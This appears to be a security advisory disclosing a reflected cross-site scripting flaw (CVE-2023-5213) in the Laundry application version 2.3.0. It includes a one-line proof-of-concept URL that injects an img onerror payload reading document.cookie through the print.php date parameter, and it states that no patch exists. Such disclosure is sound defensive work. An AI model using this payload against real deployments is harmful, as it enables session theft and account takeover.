---
slug: advisories/winehouse/
title: XSS in laundry allows to perform an account takeover
authors: Carlos Bello
writer: cbello
codename: winehouse
product: XSS in laundry allows to perform an account takeover
date: 2023-10-05 12:00 COT
cveid: CVE-2023-5213
severity: 8.8
description: XSS in laundry allows to perform an account takeover
keywords: Fluid Attacks, Security, Vulnerabilities, XSS, Laundry, CVE
banner: advisories-bg
advise: yes
template: maskedAdvisory
encrypted: yes
---

## Summary

<summary-table
    name="XSS in laundry allows to perform an account takeover"
    code="[Winehouse](https://en.wikipedia.org/wiki/Amy_Winehouse)"
    product="Laundry"
    affected-versions="Version 2.3.0"
    fixed-versions=""
    state="Public"
    release="2023-10-05">
</summary-table>

## Vulnerability

<vulnerability-table
    kind="Reflected cross-site scripting (XSS)"
    rule="[008. Reflected cross-site scripting (XSS)](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-008/)"
    remote="Yes"
    vector="CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
    score="8.8"
    available="No"
    id="[CVE-2023-5213](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5213)">
</vulnerability-table>

## Description

Laundry version 2.3.0 allows to perform an account takeover.
This is possible because the application is vulnerable to XSS.

## Vulnerability

An XSS vulnerability has been identified in laundry. This allows
an account takeover to be performed on any user accessing a malicious
link.

## Exploit

```txt
http://vulnerable.com/laundry/data/print.php?date=2023-09-26%3Cimg+src=1+onerror=%22alert(document.cookie)%22%3E
```

## Evidence of exploitation

![evidence](https://user-images.githubusercontent.com/51862990/270797926-83844158-1387-45b0-a596-f2d51f7f6b0f.png)

## Our security policy

We have reserved the ID CVE-2023-5213 to refer to this issue from now on.

* https://fluidattacks.com/advisories/policy/

## System Information

* Version: laundry 2.3.0

* Operating System: GNU/Linux

## Mitigation

There is currently no patch available for this vulnerability.

## Credits

The vulnerability was discovered by [Carlos
Bello](https://www.linkedin.com/in/carlos-andres-bello) from Fluid Attacks'
Offensive Team.

## References

**Vendor page** <https://github.com/mohaiminur/laundry/>

## Timeline

<time-lapse
  discovered="2023-09-26"
  contacted="2023-09-26"
  replied=""
  confirmed=""
  patched=""
  disclosure="2023-10-05">
</time-lapse>
